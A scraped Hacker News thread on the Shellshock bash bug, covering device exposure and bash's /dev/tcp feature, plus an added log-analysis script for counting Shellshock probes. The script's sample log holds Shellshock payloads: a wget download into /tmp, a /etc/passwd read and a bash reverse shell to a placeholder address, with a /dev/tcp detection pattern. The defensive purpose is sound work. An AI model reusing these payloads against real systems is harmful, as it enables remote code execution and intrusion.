I would just like to point out that, for all the talk of routers being vulnerable, routers in general use busybox, which in turn uses ash shell as the default shell. Most routers will not be vulnerable unless bash was explicitly installed.
Whilst this is true, many NAS boxes do remain vulnerable and tend to have features that encourage users to make them world accessible (such as media servers).
That's just openwrt. Other than VxWorks or QNX based hardware, a ton of network-connected devices ship with bash. Some even use it for their web interface backend.
Not only that, but if you're going to make a web interface available externally you're kinda asking for it. Whether it's Shellshock or not, you shouldn't let anyone but admins see admin interfaces. Restrict SSH and web access as much as possible.
"Many people are unaware that BASH actually has built-in commands for sending and receiving network traffic. They work similarly to netcat, but without requiring any other malware or supporting tools to be present on the system. The example above shows how to create an extremely useful reverse shell, just using BASH itself. Through a clever bit of advanced BASH syntax, it calls a second BASH shell, which it then binds to a network socket connected to the attacker’s IP on port 3333. Because this second shell is called with the ‘-i’ option (for “interactive” mode), it provides full two-way communication to the attacker, operating much as a normal command line shell would. The attacker has merely to listen on the correct port in order to receive a full interactive shell on the victim system."
Maybe I'm seeing this wrong, but isn't the /dev filesystem provided by the kernel?
While you are right that /dev is typically a filesystem provided by the kernel (these days; previously it was a normal "static" filesystem), bash specifically handles various filenames under /dev when used in redirection, including /dev/tcp and /dev/udp. See http://www.gnu.org/software/bash/manual/bashref.html#Redirec...
> isn't the /dev filesystem provided by the kernel?
It is, but for /dev/tcp bash isn't really using it - that gets translated instead to internal socket handling code (i.e. nothing gets created/accessed in the real /dev) much like when you use "echo" - bash uses its built-in by default instead of forking to the external command of that name.
For the "Stealing the Password File" attack what they're actually getting is a list of users, not the hashed passwords. Hashed passwords are stored in /etc/shadow in all recent (at least early 90s) systems.
This is still bad since they now will have a list of possible usernames on the system but not nearly as bad as getting access to the hashed passwords as well.
So I booted and put up my servers just for the heck of it since there's nothing I could care about being hacked in it. I was anyway going to wipe the servers and start from scratch. Discovered quite a fun log today.
Basically several hackers have gotten in, installed wordpress, (and the whole apache mysql php stack with it) and done a bunch of other stuff and left without a trace (except for the log of course). Crazy stuff. I'm wondering how many other websites have been hacked and aren't even bothering to check on it.
I've only seen 7 probes across a couple webservers in the whole time that this has been out. It's possible that they're not putting it in a place that I'd be seeing it in the logs. But overall, I'm not seeing a huge population of scanners.
To add a similar experience, I've seen 8 attempts—5 (all unique origins) on the 25th, 3 (same origin) on the 26th. This on an effectively zero traffic machine.
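For the log-watching the last two comments describe, here is an added example (not from the thread) that counts Shellshock probes in Apache combined-format access logs and groups them by day and source address. The log lines are constructed for this example using documentation addresses, shaped to match the "5 unique origins on the 25th, 3 from one origin on the 26th" pattern reported above; the detection key is the `() {` prefix at the start of a header value, which the bug requires and which no legitimate browser sends. The functions read stdin, so the same pipeline runs over a real access log.

```shell
#!/bin/sh
# Added example, not from the thread. POSIX sh plus grep, awk and sort.

# Constructed sample of Apache combined-format lines (documentation addresses,
# not real traffic). Probes land in the User-Agent and Referer fields because a
# CGI server copies those headers into the environment of the child process.
sample_log() {
cat <<'EOF'
203.0.113.10 - - [25/Sep/2014:10:12:01 +0000] "GET / HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://203.0.113.10/x -O /tmp/x\""
203.0.113.11 - - [25/Sep/2014:10:40:55 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 0 "() { :; }; echo probe" "Mozilla/5.0"
198.51.100.7 - - [25/Sep/2014:11:02:13 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 6.1)"
203.0.113.12 - - [25/Sep/2014:12:31:07 +0000] "GET /cgi-bin/status HTTP/1.1" 404 0 "-" "() { :;}; /bin/bash -c \"cat /etc/passwd\""
203.0.113.13 - - [25/Sep/2014:15:00:44 +0000] "GET / HTTP/1.1" 200 512 "-" "() { ignored;}; /bin/bash -i >& /dev/tcp/203.0.113.13/3333 0>&1"
203.0.113.14 - - [25/Sep/2014:19:22:30 +0000] "GET /cgi-bin/ HTTP/1.1" 403 0 "-" "() { :;}; /usr/bin/env ping -c 1 203.0.113.14"
198.51.100.9 - - [26/Sep/2014:03:14:15 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 0 "-" "() { :;}; echo 1"
198.51.100.9 - - [26/Sep/2014:03:14:16 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 404 0 "-" "() { :;}; echo 1"
198.51.100.9 - - [26/Sep/2014:03:14:17 +0000] "GET /cgi-bin/env.cgi HTTP/1.1" 404 0 "-" "() { :;}; echo 1"
EOF
}

# Lines whose quoted header value begins with the "() {" prefix Shellshock needs.
probe_lines() { grep -E '"\(\) *[{]'; }

# Distinct source addresses per day among probe lines.
# Field 1 is the client address, field 4 is "[dd/Mon/yyyy:hh:mm:ss".
origins_per_day() {
    probe_lines | awk '{
        day = substr($4, 2, 11); key = day SUBSEP $1
        if (!(key in seen)) { seen[key] = 1; n[day]++ }
    } END { for (d in n) print d, n[d] }' | sort
}

# Probes that carry a bash /dev/tcp reverse shell rather than an echo/ping test.
reverse_shell_probes() { probe_lines | grep -c '/dev/tcp/'; }

# Wrappers over the constructed sample, so the results can be checked offline.
count_sample_probes()    { sample_log | probe_lines | grep -c .; }
sample_origins_per_day() { sample_log | origins_per_day; }
sample_reverse_shells()  { sample_log | reverse_shell_probes; }

echo "probe requests:       $(count_sample_probes)"
echo "reverse-shell probes: $(sample_reverse_shells)"
echo "unique origins/day:"; sample_origins_per_day
```

On a real server the same pipeline is `probe_lines < /var/log/apache2/access.log | ...`; only requests that reached a CGI handler matter for exploitation, but counting every line with the prefix is what tells you how many scanners are out there, which is the question the two commenters were answering.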
conexions | 11 years ago
https://forum.openwrt.org/viewtopic.php?id=52937
buro9 | 11 years ago
I was tracking the changelog for the QNAP one that I use and was pleased to see that they didn't take too long to patch it: http://www.qnap.com/i/en/product_x_down/firmware_log.php?kw=...
peterwwillis | 11 years ago
Your office printers are probably vulnerable to this bug. So are medical devices, SANs, network switches, IP phones, cars, SCADA systems ... you name the device, I can probably name a vendor that ships bash on it. Here are the Cisco and Juniper devices affected: http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10... http://tools.cisco.com/security/center/content/CiscoSecurity...
smutticus | 11 years ago
JetSpiegel | 11 years ago
znep | 11 years ago
dspillett | 11 years ago
hjlklhj | 11 years ago
danielweber | 11 years ago
wut42 | 11 years ago
nightbrawler | 11 years ago
nstart | 11 years ago
ewest | 11 years ago
wiredfool | 11 years ago
sisk | 11 years ago
0xdeadbeefbabe | 11 years ago
[1] https://www.virustotal.com/en/file/2ff32fcfee5088b14ce6c96cc...
kethinov | 11 years ago
"That's not nice :("
https://twitter.com/hnstatus/status/515299364080590848
danielweber | 11 years ago